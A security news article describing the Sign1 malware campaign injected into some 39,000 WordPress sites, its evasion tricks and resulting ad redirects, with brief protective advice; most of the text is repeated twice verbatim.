The epidemic of intrusive ads has already hit more than 39,000 web resources.
Over the past six months, tens of thousands of web resources have fallen victim to a large-scale campaign using the previously unknown Sign1 malware. Attackers inject a virus into WordPress sites, and visitors face unwanted redirects and annoying ads in the form of pop-ups. The campaign was discovered by Sucuri, a web security firm, after one of its client's sites started displaying similar behavior.
Having gained unauthorized access to a WordPress site, usually by selecting credentials or exploiting vulnerabilities in plugins, attackers inject their JavaScript code into custom HTML widgets, a legitimate Simple Custom CSS and JS plugin, or other components, instead of modifying the management system files themselves.
The analysis showed that Sign1 uses a randomization mechanism based on the current time to continuously update the URLs from which malicious scripts are loaded. These addresses change every 10 minutes, which allows the virus to bypass the blockages.
The fact is that the domains used are registered on the eve of the attack and do not have time to get blacklisted. URLs are then used to get additional malicious elements and execute them in the browser of the infected site.
To mask its presence, Sign1 uses XOR encryption, random variable names, and checks cookies and referrers before launching.
Sign1 analyzes the traffic source and is activated only if the user came from popular resources such as Google and Yahoo search engines, Facebook and Instagram social networks. In all other cases, the malware remains inactive. In addition, the program creates a cookie marker in the browser of the infected computer so that pop-ups are shown only once for each site user.
After launching, Sign1 redirects users to fake platforms with fraudulent captchas, forcing them to turn on browser notifications with all sorts of tricks. This opens up a direct channel for attackers to display unwanted ads directly on the desktop.
Over the past six months, Sucuri scanners have detected virus activity on at least 39,000 sites. The latest wave of attacks alone, which began in January 2024, has already affected about 2,500 resources, which is of serious concern to cybersecurity experts.
To protect your resources from such threats, experts recommend using complex long passwords, regularly updating installed extensions and modules to the latest versions, and removing unnecessary and unnecessary software that can become a convenient loophole for intruders.
Over the past six months, tens of thousands of web resources have fallen victim to a large-scale campaign using the previously unknown Sign1 malware. Attackers inject a virus into WordPress sites, and visitors face unwanted redirects and annoying ads in the form of pop-ups. The campaign was discovered by Sucuri, a web security firm, after one of its client's sites started displaying similar behavior.
Having gained unauthorized access to a WordPress site, usually by selecting credentials or exploiting vulnerabilities in plugins, attackers inject their JavaScript code into custom HTML widgets, a legitimate Simple Custom CSS and JS plugin, or other components, instead of modifying the management system files themselves.
The analysis showed that Sign1 uses a randomization mechanism based on the current time to continuously update the URLs from which malicious scripts are loaded. These addresses change every 10 minutes, which allows the virus to bypass the blockages.
The fact is that the domains used are registered on the eve of the attack and do not have time to get blacklisted. URLs are then used to get additional malicious elements and execute them in the browser of the infected site.
To mask its presence, Sign1 uses XOR encryption, random variable names, and checks cookies and referrers before launching.
Sign1 analyzes the traffic source and is activated only if the user came from popular resources such as Google and Yahoo search engines, Facebook and Instagram social networks. In all other cases, the malware remains inactive. In addition, the program creates a cookie marker in the browser of the infected computer so that pop-ups are shown only once for each site user.
After launching, Sign1 redirects users to fake platforms with fraudulent captchas, forcing them to turn on browser notifications with all sorts of tricks. This opens up a direct channel for attackers to display unwanted ads directly on the desktop.
Over the past six months, Sucuri scanners have detected virus activity on at least 39,000 sites. The latest wave of attacks alone, which began in January 2024, has already affected about 2,500 resources, which is of serious concern to cybersecurity experts.
To protect your resources from such threats, experts recommend using complex long passwords, regularly updating installed extensions and modules to the latest versions, and removing unnecessary and unnecessary software that can become a convenient loophole for intruders.
